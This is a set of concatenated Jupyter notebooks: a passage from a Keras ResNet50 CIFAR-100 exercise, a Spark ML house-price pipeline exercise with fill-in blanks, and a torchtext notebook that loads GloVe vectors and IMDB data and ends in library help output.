x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f', **block_config)
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', **block_config)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', **block_config)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', **block_config)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
# A softmax that is followed by the model loss cannot be done in float16
# due to numeric issues, so we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
return models.Model(img_input, x, name='resnet50')
###Output
_____no_output_____
###Markdown
```python 정답 코드def resnet50(num_classes, batch_size=None, use_l2_regularizer=True, rescale_inputs=False, batch_norm_decay=0.9, batch_norm_epsilon=1e-5): """Instantiates the ResNet50 architecture. Args: num_classes: `int` number of classes for image classification. batch_size: Size of the batches for each step. use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer. rescale_inputs: whether to rescale inputs from 0 to 1. batch_norm_decay: Moment of batch norm layers. batch_norm_epsilon: Epsilon of batch borm layers. Returns: A Keras model instance. """ input_shape = (32, 32, 3) CIFAR100을 위한 input_shape 조정입니다. img_input = layers.Input(shape=input_shape, batch_size=batch_size) if rescale_inputs: Hub image modules expect inputs in the range [0, 1]. This rescales these inputs to the range expected by the trained model. x = layers.Lambda( lambda x: x * 255.0 - backend.constant( imagenet_preprocessing.CHANNEL_MEANS, shape=[1, 1, 3], dtype=x.dtype), name='rescale')( img_input) else: x = img_input if backend.image_data_format() == 'channels_first': x = layers.Permute((3, 1, 2))(x) bn_axis = 1 else: channels_last bn_axis = 3 block_config = dict( use_l2_regularizer=use_l2_regularizer, batch_norm_decay=batch_norm_decay, batch_norm_epsilon=batch_norm_epsilon) x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x) x = layers.Conv2D( 64, (7, 7), strides=(2, 2), padding='valid', use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name='conv1')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name='bn_conv1')( x) x = layers.Activation('relu')(x) x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x) x = conv_block( x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), **block_config) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', **block_config) x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', **block_config) x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', **block_config) x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f', **block_config) x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', **block_config) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', **block_config) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', **block_config) x = layers.GlobalAveragePooling2D()(x) x = layers.Dense( num_classes, kernel_initializer=initializers.RandomNormal(stddev=0.01), kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), bias_regularizer=_gen_l2_regularizer(use_l2_regularizer), name='fc1000')( x) A softmax that is followed by the model loss must be done cannot be done in float16 due to numeric issues. So we pass dtype=float32. x = layers.Activation('softmax', dtype='float32')(x) Create model. return models.Model(img_input, x, name='resnet50')```
###Code
model = resnet50(num_classes=100)
model.summary()
# Train the model!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1)  # train for only 1 epoch
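# Optional sanity check (a sketch, not required by the exercise): evaluate the freshly
# trained network on the held-out split. Assumption: x_test / y_test CIFAR-100 arrays
# were loaded earlier in this notebook alongside x_train / y_train.
loss, acc = model.evaluate(x_test, y_test)
print("Test accuracy:", acc)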
###Output
_____no_output_____ |
spark-training/spark-python/jupyter-ml-house-prices/House Price Pipeline Exercise.ipynb | ###Markdown
Load DataLoad sales data from S3 / HDFS. We use the built-in "csv" method, which can use the first line as column names and which also supports inferring the schema automatically. We use both options and save ourselves the code for specifying the schema explicitly.We also peek inside the data by retrieving the first five records.
###Code
from pyspark.sql.functions import *
raw_data = spark.read\
.option("header","true")\
.option("inferSchema","true")\
.csv("s3://dimajix-training/data/kc-house-data")
raw_data.limit(5).toPandas()
###Output
_____no_output_____
###Markdown
Inspect SchemaNow that we have loaded the data and that the schema was inferred automatically, let's inspect it.
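One straightforward way to do this (a sketch; `raw_data` is the DataFrame loaded in the cell above):
```python
# Print the inferred schema as a tree
raw_data.printSchema()
```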
###Code
# Print the schema of raw_data
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Split training / validation setFirst we need to split the data into a training and a validation set. Spark already provides a DataFrame method called `randomSplit` which takes an array of weights (between 0 and 1) and creates as many subsets. In our example, we want to create a training data set with 80% and the validation set should contain the remaining 20%.
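A possible solution sketch (the 80/20 weights follow the text above; the fixed seed is an assumption added here for reproducibility):
```python
# Split into 80% training and 20% validation data
training_data, validation_data = raw_data.randomSplit([0.8, 0.2], seed=1)
```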
###Code
# Split the data - 80% for training, 20% for validation
# YOUR CODE HERE
print("training_data = " + str(training_data.count()))
print("validation_data = " + str(validation_data.count()))
###Output
_____no_output_____
###Markdown
Adding more FeaturesThe RMSE tells us that on average our prediction actually performs pretty badly. How can we improve that? Obviously we used only the size of the house for the price prediction so far, but we have a whole lot of additional information. So let's make use of that. The mathematical idea is that we create a more complex (but still linear) model that also includes other features.Let's recall that a linear model looks as follows: y = SUM(coeff[i]*x[i]) + intercept This means that we are not limited to a single feature `x`, but we can use many features `x[0]...x[n]`. Let's do that with the house data! Inspect dataSince we don't have any additional information, we model some of the existing features differently. So far we used all features as direct linear predictors, which implies that a grade of 4 is twice as good as 2. Maybe that is not the case and not all predictors have a linear influence. Specifically, nominal and ordinal features should be modeled differently as categories. More on that later.First let's have a look at the data again using Spark `describe`
###Code
raw_data.describe().toPandas()
###Output
_____no_output_____
###Markdown
Additionally let's check how many different zip codes are present in the data. If they are not too many, we could consider creating a one-hot encoded feature from the zip codes. We use the SQL function `countDistinct` to find the number of different zip codes.
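A minimal sketch of this check (it assumes the zip code column is called `zipcode`, as used later in this notebook, and that `from pyspark.sql.functions import *` from the first cell is in effect):
```python
# Count distinct zip codes
raw_data.select(countDistinct("zipcode").alias("num_zipcodes")).show()
```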
###Code
# Count the number of distinct ZIP Codes using the SQL function countDistinct
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
New Features using One-Hot EncodingA simple but powerful method for creating new features from categories (i.e. nominal and ordinal features) is to use One-Hot-Encoding. For each nominal feature, the set of all possible values is indexed from 0 to some n. But since it cannot be assumed that a larger index value has a larger impact, a different approach is chosen: instead, each possible value is encoded by a 0/1 vector with only a single entry being one.Let's try that with the tools Spark provides to us. Indexing Nominal DataFirst we need to index the data. Since Spark cannot know which or how many distinct values are present in a specific column, the `StringIndexer` works like an ML algorithm: first it needs to be fit to the data, thereby returning a `StringIndexerModel` which can then be used for transforming data.Let's perform both steps and look at the result.
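As a sketch, the fit/transform pattern looks like this (the indexer configuration mirrors the following code cell, so this is one possible way to fill in its blanks):
```python
from pyspark.ml.feature import StringIndexer

indexer = StringIndexer(inputCol="zipcode", outputCol="zipcode_idx", handleInvalid="keep")
# Step 1: fit the indexer to learn the zipcode -> index mapping
index_model = indexer.fit(raw_data)
# Step 2: apply the learnt mapping, adding the zipcode_idx column
indexed_zip_data = index_model.transform(raw_data)
```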
###Code
from pyspark.ml.feature import *
indexer = StringIndexer() \
.setInputCol("zipcode") \
.setOutputCol("zipcode_idx") \
.setHandleInvalid("keep")
# Create index model using the `fit` method
index_model = # YOUR CODE HERE
# Apply the index by using the `transform` method of the index model
indexed_zip_data = # YOUR CODE HERE
# Inspect the result
indexed_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
An alternative way of configuring the indexer is to specify all relevant parameters in its constructor as follows:
###Code
indexer = StringIndexer(
inputCol = "zipcode",
outputCol = "zipcode_idx",
handleInvalid = "keep")
###Output
_____no_output_____
###Markdown
One-Hot-EncoderNow we have a single number (the index of the value) in a new column `zipcode_idx`. But in order to use this information in a linear model, we need to create sparse vectors from the index with exactly one `1`. This can be done with the `OneHotEncoder` transformer. This time no fitting is required; the class can be used directly with its `transform` method.
###Code
encoder = OneHotEncoder() \
.setInputCol("zipcode_idx") \
.setOutputCol("zipcode_onehot")
encoded_zip_data = encoder.transform(indexed_zip_data)
encoded_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
Creating PipelinesSince it would be tedious to add all features one after another and apply a full chain of transformations to the training set, the validation set and eventually to new data, Spark provides a `Pipeline` abstraction. A Pipeline simply contains a sequence of Transformations and (possibly multiple) machine learning algorithms. The whole pipeline then can be trained using the `fit` method which will return a `PipelineModel` instance. This instance contains all transformers and trained models and then can be used directly for prediction.
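To give an idea of the shape of such a pipeline, here is a partial sketch with the stages for a single nominal column plus the final assembler and regression (the column choices mirror the comments in the next cell; this is deliberately not the complete solution):
```python
from pyspark.ml import Pipeline
from pyspark.ml.feature import StringIndexer, OneHotEncoder, VectorAssembler
from pyspark.ml.regression import LinearRegression

stages = [
    # Index and one-hot encode one nominal column (repeat for the other nominal columns)
    StringIndexer(inputCol="bedrooms", outputCol="bedrooms_idx", handleInvalid="keep"),
    OneHotEncoder(inputCol="bedrooms_idx", outputCol="bedrooms_onehot"),
    # Collect the one-hot columns and the numeric columns into a single feature vector
    VectorAssembler(
        inputCols=["bedrooms_onehot", "sqft_living", "sqft_lot"],
        outputCol="features"),
    # Linear regression on the assembled features, predicting the price
    LinearRegression(featuresCol="features", labelCol="price"),
]
pipeline = Pipeline(stages=stages)
```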
###Code
from pyspark.ml import Pipeline
from pyspark.ml.feature import *
from pyspark.ml.regression import *
pipeline = Pipeline(stages = [
# For every nominal feature, you have to create a pair of StringIndexer and OneHotEncoder.
# The StringIndexer should store its index result in some new column, which then is used
# by the OneHotEncoder to create a one-hot vector.
StringIndexer(
inputCol = "bathrooms",
outputCol = "bathrooms_idx",
handleInvalid = "keep"),
OneHotEncoder(
inputCol = "bathrooms_idx",
outputCol = "bathrooms_onehot"),
# Add StringIndexers and OneHotEncoders for the following nominal columns:
# "bedrooms", "floors", "grade", "zipcode"
# YOUR CODE HERE
# In addition add OneHotEncoder for the columns "view" and "condition"
# YOUR CODE HERE
# Now add a VectorAssembler which collects all One-Hot encoded columns and the following numeric columns:
# "sqft_living", "sqft_lot", "waterfront", "sqft_above", "sqft_basement", "yr_built", "yr_renovated", "sqft_living15", "sqft_lot15"
# YOUR CODE HERE
# Finally add a LinearRegression which uses the output of the VectorAssembler as features and the
# target variable "price" as label column
# YOUR CODE HERE
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataOnce you have created the `Pipeline`, you can fit it in a single step using the `fit` method. This will return an instance of the class `PipelineModel`. Assign this model instance to a variable called `model`.And remember: use the training data for fitting!
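A one-line sketch of the fitting step (it assumes the `pipeline` and `training_data` objects from the previous cells):
```python
# Fit the whole pipeline (feature transformers + regression) on the training data
model = pipeline.fit(training_data)
```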
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataNow that we have a model, we need to measure its performance. This requires that predictions are created by applying the model to the validation data using the `transform` method of the model. The quality metric of the prediction is implemented in the `RegressionEvaluator` class from the Spark ML evaluation package. Create an instance of the evaluator and configure it appropriately to use the column `price` as the target (label) variable and the column `prediction` (which has been created by the pipeline model) as the prediction column. Also remember to set the metric name to `rmse`. Finally, feed the predicted data into the evaluator, which in turn will calculate the desired quality metric (RMSE in our case).
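A possible sketch of the three steps described above (assuming `model` and `validation_data` from the earlier cells):
```python
from pyspark.ml.evaluation import RegressionEvaluator

# Configure the evaluator for RMSE on the price column
evaluator = RegressionEvaluator(labelCol="price", predictionCol="prediction", metricName="rmse")
# Predict on the validation data and compute the metric
pred = model.transform(validation_data)
rmse = evaluator.evaluate(pred)
```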
###Code
from pyspark.ml.evaluation import *
# Create and configure a RegressionEvaluator
evaluator = # YOUR CODE HERE
# Create predictions of the validationData by using the "transform" method of the model
pred = # YOUR CODE HERE
# Now measure the quality of the prediction by using the "evaluate" method of the evaluator
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Adding more modelsAnother way of improving the overall prediction is to add multiple models to a single Pipeline. Each downstream ML algorithm has access to the predictions of the previous stages. This way we can create two independent models and eventually fit a mixed model as the last step. In this example we want to use a simple linear model created by a `LinearRegression` and combine that model with a Poisson model created by a `GeneralizedLinearRegression`. The results of both models are eventually combined using a final `LinearRegression` model.
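A sketch of the two additional regression stages described above (the feature-extraction stages and the final mixing `LinearRegression` are omitted; the column names follow the comments in the next cell):
```python
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.regression import LinearRegression, GeneralizedLinearRegression

# First prediction: plain linear model
linear = LinearRegression(
    featuresCol="features", labelCol="price", predictionCol="linear_prediction")
# Second prediction: Poisson model with log link
poisson = GeneralizedLinearRegression(
    featuresCol="features", labelCol="price", predictionCol="poisson_prediction",
    family="poisson", link="log")
# Combine both predictions into a new feature vector for the final mixing model
pred_assembler = VectorAssembler(
    inputCols=["linear_prediction", "poisson_prediction"], outputCol="pred_features")
```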
###Code
pipeline = Pipeline(stages = [
# Extract all features as done before including the VectorAssembler as the last step
# YOUR CODE HERE
# Now add a LinearRegression, but the prediction should be stored in a column "linear_prediction" instead of the default column.
# This will be our first (linear) prediction
# YOUR CODE HERE
# Now add a GeneralizedLinearRegression, which should also use the features as its input and the price as the target
# variable. Lookup settings for the GeneralizedLinearRegression in the Spark documentation and select the "poisson"
# family and the "log" link function. The prediction column should be "poisson_prediction"
# YOUR CODE HERE
# Now create a new feature from both prediction columns from both regressions above. This is done by using
# a new VectorAssembler. Set the name of the feature column to "pred_features"
# YOUR CODE HERE
LinearRegression(
featuresCol = "pred_features",
labelCol = "price",
predictionCol = "prediction")
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataAgain as usual we train a model using the `fit` method of the pipeline.
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataAnd eventually we measure the performance of the combined model by using the evaluator created some steps above.
###Code
# First create predictions by applying the learnt pipeline model to the validation data
pred = # YOUR CODE HERE
# And now calculate the performance metric by using the evaluator on the predictions
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Inspect ModelLet us inspect the coefficients of the last step, which tell us which of the two models (linear or Poisson) has more weight.
###Code
model.stages[len(model.stages)-1].coefficients
###Output
_____no_output_____ |
package use/torchtext.ipynb | ###Markdown
Using vectors
###Code
glove_vocab = torchtext.vocab.Vectors(name='glove.6B.100d.txt',cache='H:\DBAI\word_vec\glove.6B')
examples = ['chip', 'baby', 'Beautiful']
ret = glove_vocab.get_vecs_by_tokens(examples, lower_case_backup=True)
ret.shape
###Output
_____no_output_____
###Markdown
Using vocab
###Code
from tqdm.notebook import tqdm
import random
import os
def read_imdb(folder='train', data_root=r"H:\DBAI\BenchMark_DataSet\imdb\aclImdb"):
data = []
for label in ['pos', 'neg']:
folder_name = os.path.join(data_root, folder, label)
for file in tqdm(os.listdir(folder_name)):
with open(os.path.join(folder_name, file), 'rb') as f:
review = f.read().decode('utf-8').replace('\n', '').lower()
data.append([review, 1 if label == 'pos' else 0])
random.shuffle(data)
return data
import collections
import re
def get_tokenized_imdb(data):
"""
data: list of [string, label]
"""
def tokenizer(text):
text = re.sub('\.',' . ',text)
# text = re.sub('\.',' .',text)
text = re.sub('<br />',' ',text)
return [tok.lower() for tok in text.split()]
return [tokenizer(review) for review, _ in data]
def get_vocab_imdb(data):
tokenized_data = get_tokenized_imdb(data)
counter = collections.Counter([tk for st in tokenized_data for tk in st])
return torchtext.vocab.Vocab(counter, min_freq=5)
train_data = read_imdb('train')
vocab = get_vocab_imdb(train_data)
words = ['chip', 'baby', 'Beautiful']
[vocab.stoi[word] for word in words]
import torch
def load_pretrained_embedding(words, pretrained_vocab):
"""从预训练好的vocab中提取出words对应的词向量"""
embed = torch.zeros(len(words), pretrained_vocab.vectors[0].shape[0]) # 初始化为0
oov_count = 0 # out of vocabulary
for i, word in enumerate(words):
try:
idx = pretrained_vocab.stoi[word]
embed[i, :] = pretrained_vocab.vectors[idx]
except KeyError:
oov_count += 1
# print(word)
if oov_count > 0:
print("There are %d oov words." % oov_count)
return embed
load_pretrained_embedding(vocab.itos[8:9], glove_vocab)
# vocab.itos[8]
###Output
_____no_output_____
###Markdown
Other parts of the full native workflow (not planning to explore them in depth). Field was originally meant for configuring data fields, but it has been given too many responsibilities. Dataset-related operations are also encapsulated, but I think they need quite a few application-level adjustments, so they are not well suited for such encapsulation. Dataset fetching, on the other hand, is a nice resource pipeline. Using dataset
###Code
# set up fields
TEXT = torchtext.data.Field(lower=True, include_lengths=False, batch_first=True)
LABEL = torchtext.data.Field(sequential=False)
# make splits for data
train, test = torchtext.datasets.IMDB.splits(TEXT, LABEL, root=r'H:\DBAI\BenchMark_DataSet')
# build the vocabulary
TEXT.build_vocab(train,
vectors=torchtext.vocab.Vectors(name='glove.6B.100d.txt',
cache='H:\DBAI\word_vec\glove.6B'))
LABEL.build_vocab(train)
# make iterator for splits
train_iter, test_iter = torchtext.data.BucketIterator.splits(
(train, test), batch_size=3, device=0)
for idx,batch in enumerate(train_iter):
print(batch,idx)
print(batch.text)
if idx==0:break
len(train_iter)
help(torchtext.datasets)
###Output
Help on package torchtext.datasets in torchtext:
NAME
torchtext.datasets
PACKAGE CONTENTS
babi
imdb
language_modeling
nli
sequence_tagging
sst
text_classification
translation
trec
unsupervised_learning
CLASSES
torch.utils.data.dataset.Dataset(builtins.object)
torchtext.datasets.text_classification.TextClassificationDataset
torchtext.datasets.unsupervised_learning.EnWik9
torchtext.data.dataset.Dataset(torch.utils.data.dataset.Dataset)
torchtext.datasets.babi.BABI20
torchtext.datasets.imdb.IMDB
torchtext.datasets.language_modeling.LanguageModelingDataset
torchtext.datasets.language_modeling.PennTreebank
torchtext.datasets.language_modeling.WikiText103
torchtext.datasets.language_modeling.WikiText2
torchtext.datasets.sequence_tagging.SequenceTaggingDataset
torchtext.datasets.sequence_tagging.CoNLL2000Chunking
torchtext.datasets.sequence_tagging.UDPOS
torchtext.datasets.sst.SST
torchtext.datasets.translation.TranslationDataset
torchtext.datasets.translation.IWSLT
torchtext.datasets.translation.Multi30k
torchtext.datasets.translation.WMT14
torchtext.datasets.trec.TREC
torchtext.datasets.nli.NLIDataset(torchtext.data.dataset.TabularDataset)
torchtext.datasets.nli.MultiNLI
torchtext.datasets.nli.SNLI
torchtext.datasets.nli.XNLI
class BABI20(torchtext.data.dataset.Dataset)
| BABI20(path, text_field, only_supporting=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| BABI20
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, only_supporting=False, **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, root='.data', memory_size=50, task=1, joint=False, tenK=False, only_supporting=False, sort=False, shuffle=False, device=None, **kwargs) from builtins.type
|
| splits(text_field, path=None, root='.data', task=1, joint=False, tenK=False, only_supporting=False, train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = ''
|
| urls = ['http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2....
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class CoNLL2000Chunking(SequenceTaggingDataset)
| CoNLL2000Chunking(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| CoNLL2000Chunking
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(fields, root='.data', train='train.txt', test='test.txt', validation_frac=0.1, **kwargs) from builtins.type
| Downloads and loads the CoNLL 2000 Chunking dataset.
| NOTE: There is only a train and test dataset so we use
| 10% of the train set as validation
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'conll2000'
|
| urls = ['https://www.clips.uantwerpen.be/conll2000/chunking/train.txt....
|
| ----------------------------------------------------------------------
| Methods inherited from SequenceTaggingDataset:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
| Create a dataset from a list of Examples and Fields.
|
| Arguments:
| examples: List of Examples.
| fields (List(tuple(str, Field))): The Fields to use in this tuple. The
| string is a field name, and the Field is the associated field.
| filter_pred (callable or None): Use only examples for which
| filter_pred(example) is True, or use all examples if None.
| Default is None.
|
| ----------------------------------------------------------------------
| Static methods inherited from SequenceTaggingDataset:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class EnWik9(torch.utils.data.dataset.Dataset)
| EnWik9(begin_line=0, num_lines=6348957, root='.data')
|
| Compressed size of first 10^9 bytes of enwiki-20060303-pages-articles.xml.
| It's part of Large Text Compression Benchmark project
|
| Method resolution order:
| EnWik9
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __getitem__(self, i)
|
| __init__(self, begin_line=0, num_lines=6348957, root='.data')
| Initiate EnWik9 dataset.
|
| Arguments:
| begin_line: the number of beginning line. Default: 0
| num_lines: the number of lines to be loaded. Default: 6348957
| root: Directory where the datasets are saved. Default: ".data"
| data: a list of label/tokens tuple. tokens are a tensor after
|
| Examples:
| >>> from torchtext.datasets import EnWik9
| >>> enwik9 = EnWik9(num_lines=20000)
| >>> vocab = enwik9.get_vocab()
|
| __iter__(self)
|
| __len__(self)
|
| get_vocab(self)
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class IMDB(torchtext.data.dataset.Dataset)
| IMDB(path, text_field, label_field, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| IMDB
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, **kwargs)
| Create an IMDB dataset instance given a path and fields.
|
| Arguments:
| path: Path to the dataset's highest level directory
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the IMDB dataset.
|
| Arguments:
| batch_size: Batch_size
| device: Device to create batches on. Use - 1 for CPU and None for
| the currently active GPU device.
| root: The root directory that contains the imdb dataset subdirectory
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
|
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train', test='test', **kwargs) from builtins.type
| Create dataset objects for splits of the IMDB dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: Root dataset storage directory. Default is '.data'.
| train: The directory that contains the training examples
| test: The directory that contains the test examples
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'aclImdb'
|
| name = 'imdb'
|
| urls = ['http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.g...
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
